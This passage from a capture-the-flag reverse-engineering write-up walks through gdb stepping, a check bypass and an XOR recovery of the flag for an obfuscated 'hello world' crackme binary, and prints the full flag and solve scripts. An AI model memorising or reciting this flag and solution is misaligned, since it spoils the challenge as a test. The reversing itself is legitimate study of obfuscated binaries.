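    """xor argv[1] with the key until the NUL terminator; returns (result, count)."""
    buf = bytearray(arg + b"\x00")    # argv strings are NUL-terminated
    count = 0                         # rbx
    while buf[count] != 0:            # mov dl, [r8] ; test dl, dl ; je
        buf[count] ^= key[count]      # xor dl, [r9] ; mov [r8], dl
        count += 1                    # inc rbx / inc r8 / inc r9
    return bytes(buf[:count]), count

out, count = xor_arg_in_place(b"A" * 8, KEY_HEAD)
print(out.hex(), count)
```

the key has to be at least as long as the argument for this toy version, which is why the demo only feeds it 8 bytes.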

anyways spamming stepis gets us to this code block:

    0x55555555528c 4883ec08              <__do_global_dtors_aux+0x19c>   sub    rsp, 0x8
    0x555555555290 58                    <__do_global_dtors_aux+0x1a0>   pop    rax
 -> 0x555555555291 4883fb30              <__do_global_dtors_aux+0x1a1>   cmp    rbx, 0x30

waow. a cmp rbx, 0x30. as we recall, rbx is just a loop counter, which means that it’s also the number of characters in our input. this means that our input should probably be 0x30 bytes long. re-running with 0x30 As in the input and once again spamming stepis gets us to this block of code:

 -> 0x5555555552b2 488d3598ffffff        <__do_global_dtors_aux+0x1c2>   lea    rsi, [rip + 0xffffffffffffff98] # 0x555555555251 <__do_global_dtors_aux+0x161>
    0x5555555552b9 4c87f4                <__do_global_dtors_aux+0x1c9>   xchg   rsp, r14
    0x5555555552bc 4883ec08              <__do_global_dtors_aux+0x1cc>   sub    rsp, 0x8
    0x5555555552c0 58                    <__do_global_dtors_aux+0x1d0>   pop    rax
    0x5555555552c1 f3a6                  <__do_global_dtors_aux+0x1d1>   repz   cmps BYTE PTR [rsi], BYTE PTR [rdi]
    0x5555555552c3 7408                  <__do_global_dtors_aux+0x1d3>   je     0x5555555552cd <__do_global_dtors_aux+0x1dd>

a repz cmps of bytes from [rsi] to [rdi]. before we do anything let’s just trivially bypass whatever check this is by setting rsi == rdi. doing so reveals that it prints a hidden message here.

gef> set $rsi=$rdi
gef> c
Continuing.
nice!
Hello world!
[Inferior 1 (process 247098) exited normally]

cool, so our goal should clearly be to pass this check.

we can just verify which two arrays are even being compared by inspecting the values of $rsi and $rdi.

gef> x/16g $rsi
0x555555555251 <__do_global_dtors_aux+353>:	0x219be0379c6a6c80	0x90797c2d3a578bed
0x555555555261 <__do_global_dtors_aux+369>:	0x028698eb2938a09b	0x32d4d62c398d908a
0x555555555271 <__do_global_dtors_aux+385>:	0xf12b353678c36ebf	0x7dda959984ae9bf4
0x555555555281 <__do_global_dtors_aux+401>:	0x000a216563696e00	0x5808ec8348f4874c
0x555555555291 <__do_global_dtors_aux+417>:	0x2d48087430fb8348	0x054806ebffffff85
0x5555555552a1 <__do_global_dtors_aux+433>:	0xf4874c5000000021	0x7e8b48d98948fcc3
0x5555555552b1 <__do_global_dtors_aux+449>:	0xffffff98358d4808	0x5808ec8348f4874c
0x5555555552c1 <__do_global_dtors_aux+465>:	0xffa62d480874a6f3	0x002e054806ebffff
gef> x/16x $rdi
0x7fffffffdfff:	0x09b5c60dbb5f4eb2	0xbf5744091949adc2
0x7fffffffe00f:	0x1ca8b5c60d11bebe	0x09a4c80914bebebc
0x7fffffffe01f:	0xc80941414de744cc	0x41f9bebebd8ba986
0x7fffffffe02f:	0x45545f5353454c00	0x65735f5041434d52
0x7fffffffe03f:	0x414d006d305b1b3d	0x2f7261762f3d4c49
0x7fffffffe04f:	0x76616e2f6c69616d	0x6e3d524553550069
0x7fffffffe05f:	0x474e414c00697661	0x006e653d45474155
0x7fffffffe06f:	0x5245545f5353454c	0x3d65755f5041434d

interestingly, note that rdi is just the address of our xored-in-place argument, and rsi is this array in the binary. recalling our xor-loop over the argument, we remember that the xor-key was stored in r9 during that weird code block, so we can just yoink the bytes from there by breakpointing at that block again.

gef> x/16g $r9
0x555555555338 <frame_dummy>:	0x48f4874cfa1e0ff3	0xfe1605485808ec83
0x555555555348 <frame_dummy+16>:	0x5de9f4874c50ffff	0x48e5894855fffffd
0x555555555358 <main+5>:	0x894800000ca6058d	0x00b8fffffccae8c7
0x555555555368 <main+21>:	0x000000c35d000000	0x08ec8348fa1e0ff3

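we xor the two bytestrings starting at those addresses to get our flag ^_^ (the hex below is copied straight from the x/g output, so every 8-byte chunk is byte-reversed and gets flipped back when printing.)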

from pwn import xor

a = '48f4874cfa1e0ff3fe1605485808ec835de9f4874c50ffff48e5894855fffffd894800000ca6058d00b8fffffccae8c7'
b = '219be0379c6a6c8090797c2d3a578bed028698eb2938a09b32d4d62c398d908af12b353678c36ebf7dda959984ae9bf4'

z = xor(bytes.fromhex(a), bytes.fromhex(b))
for i in range(0, len(z), 8):
    print(z[i:i+8][::-1].decode(), end='')
navi@curette (inals/re/hello_world/dist) > python solve.py
sctf{going_beyond_hello_world_1z2ket65cx3sdxfjb}                                                                                                       
navi@curette (inals/re/hello_world/dist) > ./helloworld.elf $(python solve.py)
nice!
Hello world!
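if you don't have pwntools around, the same thing works with just the stdlib. a small variant, not the script i actually ran: it treats the gdb output as the little-endian qwords they are, so there's no manual chunk reversing. recover is a made-up helper name; the constants are the first six qwords from the two dumps above.

```python
# first 0x30 bytes at $r9 (the key) and at $rsi (the expected result), as gdb printed them
KEY_QWORDS = [
    0x48f4874cfa1e0ff3, 0xfe1605485808ec83, 0x5de9f4874c50ffff,
    0x48e5894855fffffd, 0x894800000ca6058d, 0x00b8fffffccae8c7,
]
TARGET_QWORDS = [
    0x219be0379c6a6c80, 0x90797c2d3a578bed, 0x028698eb2938a09b,
    0x32d4d62c398d908a, 0xf12b353678c36ebf, 0x7dda959984ae9bf4,
]

def recover(key_qwords, target_qwords):
    """input ^ key == target, so input == target ^ key, qword by qword."""
    return b"".join(
        (k ^ t).to_bytes(8, "little") for k, t in zip(key_qwords, target_qwords)
    )

flag = recover(KEY_QWORDS, TARGET_QWORDS).decode()
print(flag, len(flag))
```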

closing

the actual obfuscation method used here is very cool, and i would be remiss not to mention elma’s great writeup on it, so do read that if you want to actually learn what the libc_start_main trampoline obfuscation nonsense at play here is. the purpose of this writeup is more so to share how a solver would even go about dealing with this sort of obfuscation.

i think a better, more complete solve would completely unwind the obfuscation and have a nice control flow graph to look at instead of just rawdogging different blocks of asm via eyepower. i did want to learn some more tools / frameworks to get this done: if the binary was even more complicated, tracing manually and haphazardly like this would Not be feasible, and you would need a more sophisticated approach. unfortunately this is not a level of sophistication i have :S